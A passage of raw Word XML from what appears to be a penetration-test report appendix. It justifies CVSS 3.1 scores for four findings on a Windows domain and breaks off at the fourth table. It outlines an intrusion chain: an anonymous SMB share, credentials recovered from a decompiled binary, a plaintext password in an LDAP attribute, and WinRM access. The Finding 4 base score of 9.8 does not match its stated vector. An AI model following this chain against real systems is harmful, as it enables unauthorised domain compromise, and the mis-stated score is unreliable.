      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix E – CVSS 3.1 Scoring Justification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="081D87B1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc233206085"/>
      <w:r>
        <w:t>Finding 1: Anonymous SMB Share — Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N — Base Score: 5.3</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6160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87B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B2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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B3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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B4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87B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B6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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B7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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B8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitable remotely over SMB (445/TCP) with no local access required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87B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BA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity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BB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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BC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A standard </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>smbclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -N null session suffices; no special conditions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87C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BE" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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BF"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0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Anonymous/null session access — no credentials needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87C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C2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction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3"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4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fully automatable, no victim action required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87C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C6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope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7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unchanged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8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact confined to the vulnerable share component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87C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CA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality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B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exposes a binary file — a stepping stone, not direct sensitive data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87D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CE" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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CF"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D0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No ability to modify share contents in this finding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87D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D2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability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D3"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D4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No impact on service availability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D87D6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc233206086"/>
      <w:r>
        <w:t>Finding 2: Hardcoded Credentials — Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N — Base Score: 7.5</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6160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87D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D7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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D8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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D9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87D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DB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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DC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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DD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Binary retrieved over network; credential used against a network-facing LDAP service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87E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DF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity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0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Static XOR with a recoverable key is trivial to break via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>decompilation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87E6"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E3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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4"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5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication needed to decompile an already-obtained binary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87E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E7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction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8"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9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fully automatable static analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87E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EB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope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C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unchanged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ED" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compromise limited to the credential itself at this stage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87F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EF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality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F0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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F1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full recovery of a valid, usable LDAP service account password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87F6"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F3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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F4"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F5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No write/modify capability from this finding alone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87F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7F7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability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F8"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7F9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No availability impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D87FB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc233206087"/>
      <w:r>
        <w:t>Finding 3: Cleartext Credential in info Attribute — Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N — Base Score: 8.1</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6160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87F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FC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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FD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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7FE" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D8803"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00" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP query performed remotely over the network (389/TCP).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D880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04" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity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5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A single, standard </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ldapsearch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> query with no special setup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D880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08" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Requires the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ldap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> service account credential from Finding 2 — non-administrative.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D880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0C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction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D"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0E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No victim interaction involved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D8813"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10" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Scope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1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unchanged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2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Directly compromises one additional account; domain-wide impact is Finding 4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D881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14" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality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5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full plaintext password for an interactive domain user recovered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D881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18" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Recovered credential grants an interactive </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> session with command execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D881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1C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability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D"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1E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No direct availability impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D8820" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc233206088"/>
      <w:r>
        <w:t xml:space="preserve">Finding 4: Excessive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ACE — Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H — Base Score: 9.8</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6160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D882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821" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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822" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="9FEF00"/>
